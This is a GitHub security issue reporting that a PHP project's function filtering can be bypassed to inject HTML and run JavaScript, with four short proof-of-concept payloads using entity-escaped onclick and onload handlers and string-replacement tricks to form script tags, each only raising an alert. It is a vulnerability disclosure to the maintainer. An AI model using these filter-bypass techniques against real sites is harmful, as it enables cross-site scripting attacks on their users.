Skip to content
This repository has been archived by the owner on Mar 13, 2019. It is now read-only.

Inserting html code allows for javascript to be called #8

Open
NoRelect opened this issue Jul 10, 2016 · 0 comments
Open

Inserting html code allows for javascript to be called #8

NoRelect opened this issue Jul 10, 2016 · 0 comments
Assignees
@julianschmuckli
Labels
Security: Cross Site Scripting

Comments

@NoRelect
Copy link
Contributor

NoRelect commented Jul 10, 2016
edited
Loading

The fact that you can insert custom html allows for the onload method to be used to execute javascript. Combining this with the escaped html chars it also passes function replacement:

?> <button onclick="alert&#40;&#34;Hacked&#34;&#41;">Click me for action</button> <?php

The same is also possible with the following:

echo("<!DOCTYPE html><html><head>");
echo("<body onload=alert&#40;&#34;Hacked&#34;&#41;>");

It is also possible like this (unnecessary):

$decoded = jks_string_html_cd("&#60;script&#62;alert(&#34;hacked&#34;)&#60;/script&#62;");
echo("<!DOCTYPE html><head></head><body>");
echo($decoded);

or like this:

$m = "<pre>alert(^hacked^)</pre>";
$m = jks_string_repl("pre","script",$m);
$m = jks_string_repl("^","\"",$m);
echo("<!DOCTYPE html><head></head><body>");
echo($m);
@NoRelect NoRelect changed the title Inserting html code allows for javascript onload to be called Inserting html code allows for javascript to be called Jul 10, 2016
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees

@julianschmuckli julianschmuckli

Labels
Security: Cross Site Scripting
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@julianschmuckli @NoRelect